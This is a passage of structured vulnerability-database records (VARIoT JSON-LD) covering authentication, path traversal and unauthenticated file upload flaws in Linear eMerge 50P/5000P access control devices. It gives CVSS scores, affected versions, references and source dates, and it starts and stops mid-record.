      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-10-10T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-34617"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158701"
          },
          {
            "date": "2019-07-08T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-006014"
          },
          {
            "date": "2019-07-02T17:15:12.133000",
            "db": "NVD",
            "id": "CVE-2019-7266"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-097"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-10-11T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-34617"
          },
          {
            "date": "2020-08-24T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158701"
          },
          {
            "date": "2019-07-08T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-006014"
          },
          {
            "date": "2022-10-13T19:46:08.313000",
            "db": "NVD",
            "id": "CVE-2019-7266"
          },
          {
            "date": "2020-08-25T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-097"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-097"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear eMerge 50P/5000P Authentication vulnerabilities in devices",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006014"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "authorization issue",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-097"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201907-0168

    Vulnerability from variot - Updated: 2023-12-18 13:23

    Linear eMerge 50P/5000P The device contains a path traversal vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The Linear eMerge 50P / 5000P is a browser-managed access control security system from Nortek Security & Control.

    Linear eMerge 50P / 5000P has a directory traversal vulnerability. An attacker could use this vulnerability to traverse the file system to access files or directories outside the restricted directory. The vulnerability stems from a network system or product that fails to properly filter resources or special elements in file paths

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201907-0168",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "linear emerge 50p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "4.6.07"
          },
          {
            "model": "linear emerge 5000p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "4.6.07"
          },
          {
            "model": "linear emerge 5000p",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "linear emerge 50p",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "security \u0026 control linear emerge 50p 5000p version)",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "nortek",
            "version": "/\u003c=4.6.07(79330"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34616"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006145"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7267"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_50p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.6.07",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_50p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_5000p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.6.07",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_5000p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7267"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Sipke Mellema",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-096"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2019-7267",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Partial",
                "baseScore": 7.5,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "CVE-2019-7267",
                "impactScore": null,
                "integrityImpact": "Partial",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2019-34616",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-158702",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2019-7267",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2019-7267",
                "trust": 1.8,
                "value": "CRITICAL"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2019-34616",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201907-096",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-158702",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34616"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158702"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006145"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7267"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-096"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear eMerge 50P/5000P The device contains a path traversal vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The Linear eMerge 50P / 5000P is a browser-managed access control security system from Nortek Security \u0026 Control. \n\nLinear eMerge 50P / 5000P has a directory traversal vulnerability. An attacker could use this vulnerability to traverse the file system to access files or directories outside the restricted directory. The vulnerability stems from a network system or product that fails to properly filter resources or special elements in file paths",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006145"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-34616"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158702"
          }
        ],
        "trust": 1.35
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-7267",
            "trust": 3.1
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-20-184-01",
            "trust": 1.7
          },
          {
            "db": "PACKETSTORM",
            "id": "155250",
            "trust": 1.7
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006145",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-096",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-34616",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2020.2294",
            "trust": 0.6
          },
          {
            "db": "NSFOCUS",
            "id": "47258",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-158702",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34616"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158702"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006145"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7267"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-096"
          }
        ]
      },
      "id": "VAR-201907-0168",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34616"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158702"
          }
        ],
        "trust": 1.7
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34616"
          }
        ]
      },
      "last_update_date": "2023-12-18T13:23:40.572000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "EMERGE 50P/5000P BROWSER MANAGED ACCESS SYSTEMS 4.X",
            "trust": 0.8,
            "url": "https://www.nortekcontrol.com/products/access-control-systems/emerge-browser-managed-access-systems-2/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006145"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-22",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158702"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006145"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7267"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.applied-risk.com/resources/ar-2019-006"
          },
          {
            "trust": 2.0,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7267"
          },
          {
            "trust": 1.7,
            "url": "http://packetstormsecurity.com/files/155250/linear-emerge50p-5000p-4.6.07-remote-code-execution.html"
          },
          {
            "trust": 1.7,
            "url": "https://applied-risk.com/labs/advisories"
          },
          {
            "trust": 1.7,
            "url": "https://www.us-cert.gov/ics/advisories/icsa-20-184-01"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7267"
          },
          {
            "trust": 0.6,
            "url": "http://www.nsfocus.net/vulndb/47258"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2020.2294/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34616"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158702"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006145"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7267"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-096"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34616"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158702"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006145"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7267"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-096"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-10-10T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-34616"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158702"
          },
          {
            "date": "2019-07-11T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-006145"
          },
          {
            "date": "2019-07-02T17:15:12.197000",
            "db": "NVD",
            "id": "CVE-2019-7267"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-096"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-10-11T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-34616"
          },
          {
            "date": "2020-07-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158702"
          },
          {
            "date": "2019-07-11T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-006145"
          },
          {
            "date": "2022-10-13T19:49:26.520000",
            "db": "NVD",
            "id": "CVE-2019-7267"
          },
          {
            "date": "2020-07-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-096"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-096"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear eMerge 50P/5000P Path traversal vulnerability in devices",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006145"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "path traversal",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-096"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201907-0169

    Vulnerability from variot - Updated: 2023-12-18 13:23

    Linear eMerge 50P/5000P devices allow Unauthenticated File Upload. Linear eMerge 50P/5000P The device contains a vulnerability related to unlimited uploads of dangerous types of files.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The Linear eMerge 50P / 5000P is a browser-managed access control security system from Nortek Security & Control. An attacker could use this vulnerability to upload a file with an arbitrary extension to a directory in the application's Web root directory and execute the uploaded file with the permissions of the Web server

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201907-0169",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "linear emerge 50p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "4.6.07"
          },
          {
            "model": "linear emerge 5000p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "4.6.07"
          },
          {
            "model": "linear emerge 5000p",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "linear emerge 50p",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "security \u0026 control linear emerge 50p 5000p version)",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "nortek",
            "version": "/\u003c=4.6.07(79330"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34615"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006077"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7268"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_50p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.6.07",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_50p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_5000p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.6.07",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_5000p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7268"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Sipke Mellema",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-095"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2019-7268",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Complete",
                "baseScore": 10.0,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "CVE-2019-7268",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2019-34615",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
